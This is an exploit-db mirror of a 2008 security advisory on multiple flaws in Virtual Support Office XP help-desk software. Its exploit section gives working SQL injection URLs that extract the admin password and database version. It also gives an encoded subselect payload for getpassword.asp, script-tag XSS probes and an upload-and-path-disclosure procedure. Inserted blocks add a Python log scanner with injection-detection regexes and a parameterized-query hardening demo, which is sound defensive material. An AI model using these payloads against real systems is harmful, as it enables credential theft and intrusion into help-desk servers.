exploit-db-mirror/platforms/asp/webapps/5869.txt
Offensive Security f88827eb1f DB: 2016-12-10
4 new exploits
2016-12-10 05:01:16 +00:00

########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Virtual Support Office-XP Multiple Vulnerabilities.
# Vendor: www.vso-xp.com
# Vulnerable Version: 3.0.29, 3.0.27 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/47
###################################################################################
####################
1. Description:
####################
Virtual Support Office XP is a web-based help desk software solution which allows you to forge strong
relationships and increase customer satisfaction, while dramatically streamlining support operations.
With the VSO-XP application, customer service and support professionals have the tools they need to
surpass the most ambitious quality-of-service or productivity goals you establish.
####################
2. Vulnerabilities:
####################
2.1. Broken Authentication and Session Management. An attacker can access classified information and view some of the admin pages, such as:
"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The last one is particularly important, since there she can change the server's name, mailbox and port.
2.2. Broken Authentication. An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosing any kind of information; even submitting a real email address is not necessary. She can then obtain her password by injection (see below).
2.3. Broken Authentication and Session Management. An attacker can create an admin user at "/admin/addressnew.asp".
2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in the "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes, including the admin's. She can also get other information such as the version of the database and...
2.4.1. Exploit:
Check the exploit section.
2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in the "userID" parameter. By using it an attacker can obtain the password of any user she wishes.
2.5.1. Exploit:
Check the exploit section.
2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in the "keyid" parameter. Classified information can be obtained.
2.6.1. POC:
https://url/admin/accountupd.asp?keyid=1%20having%201=1
2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter.
2.7.1. POC:
https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1
2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter.
2.8.1. POC:
https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2
2.9. Cross Site Scripting. There is an XSS in "/cases/case_search.asp" in the search field.
2.9.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.10. Cross Site Scripting. There is an XSS in "/url/kb/kb_home.asp" in the search field.
2.10.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.11. Cross Site Scripting. There is an XSS in "/downloads/search_folders.asp" in the search fields.
2.11.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.12. Cross Site Scripting. There is an XSS in "/reports/MyIssuesReport.asp?id=336" in the Report Title and Subject fields.
2.12.1. POC:
Insert "><script>alert("mach BugReport.IR XSS");</script>
2.13. Arbitrary File Upload and Path Disclosure. The application is vulnerable to file uploading and to finding the physical path of the uploaded file.
2.13.1. Exploit:
Check the exploit section.
2.14. Path disclosure.
2.14.1. POC:
https://url/admin/accountnew2.asp
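Detection logic a defender could run over web-server access logs for the probes listed in section 2. This is an added example, not part of the AmnPardaz advisory: the log lines are constructed in IIS W3C style, and the signature regexes are assumptions derived from the PoC strings above (having 1=1, union select, order by, the getpassword subselect and the script tag), so they catch these specific probes rather than SQL injection in general.

```python
"""Flag requests in IIS-style access logs that match the injection and
XSS probes described in the advisory (added example, not advisory code;
sample log lines and signatures are constructed/assumed)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log in W3C extended format:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2008-06-20 10:01:02 198.51.100.7 GET /admin/accountupd.asp keyid=1%20having%201=1 200
2008-06-20 10:01:05 198.51.100.7 GET /admin/CustomFields.asp Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users-- 200
2008-06-20 10:01:09 198.51.100.7 GET /admin/EmailAccountsUpd_process.asp KeyID=1+order+by+2 500
2008-06-20 10:02:11 203.0.113.5 GET /cases/case_search.asp q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 200
2008-06-20 10:03:00 192.0.2.44 GET /cases/case_search.asp q=printer+jam 200
2008-06-20 10:03:30 192.0.2.44 GET /admin/accountupd.asp keyid=42 200
"""

# Signatures (label, regex) matched against the decoded, lower-cased,
# whitespace-normalised query string. Derived from the advisory's PoCs.
SIGNATURES = [
    ("sqli-having", re.compile(r"\bhaving\s+\d+\s*=\s*\d+")),
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("sqli-orderby", re.compile(r"\border\s+by\s+\d+")),
    ("sqli-subselect", re.compile(r"'\s*or\s+\d+\s+in\s*\(\s*select\b")),
    ("xss-script-tag", re.compile(r"<\s*script\b")),
]

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def normalise(query: str) -> str:
    """URL-decode twice (to catch double encoding), lower-case and collapse
    whitespace so encoded variants hit the same signature."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def scan_line(line: str):
    """Return (ip, stem, label) for every signature that fires on one line;
    lines that do not parse are ignored rather than raising."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    q = normalise(m.group("query"))
    return [(m.group("ip"), m.group("stem"), label)
            for label, rx in SIGNATURES if rx.search(q)]


def scan_log(text: str):
    """Scan a whole log; hits are returned in file order."""
    hits = []
    for line in text.splitlines():
        hits.extend(scan_line(line))
    return hits


def offenders(text: str, threshold: int = 2):
    """Source IPs with at least `threshold` hits, as candidates for review."""
    counts = {}
    for ip, _, _ in scan_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, stem, label in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} {label}")
    print("offenders:", offenders(SAMPLE_LOG))
```

Decoding before matching matters: the advisory's PoCs arrive with `%20` or `+` for spaces, and a signature applied to the raw query string would miss them. On the constructed sample, three hits come from one source and the XSS probe from another, so the threshold-based `offenders` view surfaces the scanning host first.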
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/47/exploit
Note1: Use Internet Explorer (IE) for best results.
3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter.
-------------
Obtain admin's password:
https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
-------------
Get other information such as version of the database and...:
https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
-------------
3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter.
Insert the following code with Burp Proxy into the userID field, change ANYUSERID to the userID of your choice and get the password!
-------------
obtain the password of any user she wishes:
m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29--
-------------
3.13.1 Scenario for file uploading and finding the physical path to the file.
-------------
Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0"
Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file.
Step3: Go back to step 1 and find your file's ID.
Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server!
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly validated and encoded against XSS and injection, and wait for a vendor patch.
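What "properly sanitized" means in practice for the flaws above: validate numeric IDs (keyid, Group_ID, Client_ID) as integers before they reach SQL, bind every value as a query parameter instead of concatenating it, and HTML-encode search terms when echoing them. The application is classic ASP; this added example (not from the advisory or the vendor) shows the same fixes with Python's sqlite3, with an in-memory table and column names constructed for the demo, and keeps the concatenation pattern alongside only to show what the fix replaces.

```python
"""Vulnerable pattern beside its hardened form for the SQL injection and
XSS findings (added example; schema and data are constructed)."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the help-desk database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(userid TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE customfields(id INTEGER PRIMARY KEY, group_id INTEGER,
                                  name TEXT);
        INSERT INTO users VALUES ('admin', 'example-admin-secret');
        INSERT INTO customfields VALUES (1, 1, 'Priority'), (2, 2, 'Region');
    """)
    return conn


# --- Vulnerable pattern (what the advisory describes): the raw request
# parameter is concatenated into the statement, so SQL in it is executed.
def custom_fields_vulnerable(conn, group_id: str):
    sql = "SELECT name, group_id FROM customfields WHERE group_id = " + group_id
    return conn.execute(sql).fetchall()


# --- Hardened form: validate the type first, then bind the value.
class BadRequest(ValueError):
    """Raised for input that fails validation; map it to HTTP 400."""


def parse_id(raw: str) -> int:
    """Numeric IDs such as keyid, Group_ID and Client_ID must be plain
    unsigned integers; anything else is rejected before any SQL runs."""
    if raw is None or not raw.isdigit():
        raise BadRequest(f"invalid id: {raw!r}")
    return int(raw)


def custom_fields_safe(conn, group_id_raw: str):
    group_id = parse_id(group_id_raw)
    sql = "SELECT name, group_id FROM customfields WHERE group_id = ?"
    return conn.execute(sql, (group_id,)).fetchall()


def lookup_password_safe(conn, userid: str):
    """Free-text parameters are bound too: a quote or keyword in the input
    is data to the engine, never syntax. (A real fix would also store
    password hashes rather than returning plaintext as getpassword.asp does.)"""
    row = conn.execute("SELECT password FROM users WHERE userid = ?",
                       (userid,)).fetchone()
    return row[0] if row else None


# --- Output encoding for the search boxes (2.9 to 2.12): encode on output
# so a submitted "><script> is rendered as text, not parsed as markup.
def render_search_echo(term: str) -> str:
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    print(custom_fields_safe(db, "2"))
    try:
        custom_fields_safe(db, "1 union select password,1 from users")
    except BadRequest as e:
        print("rejected:", e)
    print(render_search_echo('"><script>alert(1)</script>'))
```

Validation and parameter binding are complementary: `parse_id` rejects the probe outright with a 400 (which is also the cleanest thing to log and alert on), while binding protects parameters like userID that legitimately contain arbitrary text. Output encoding belongs at the point of rendering, not at input time, so the same search term can be stored and searched safely.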
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Web security is our art.
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-06-20]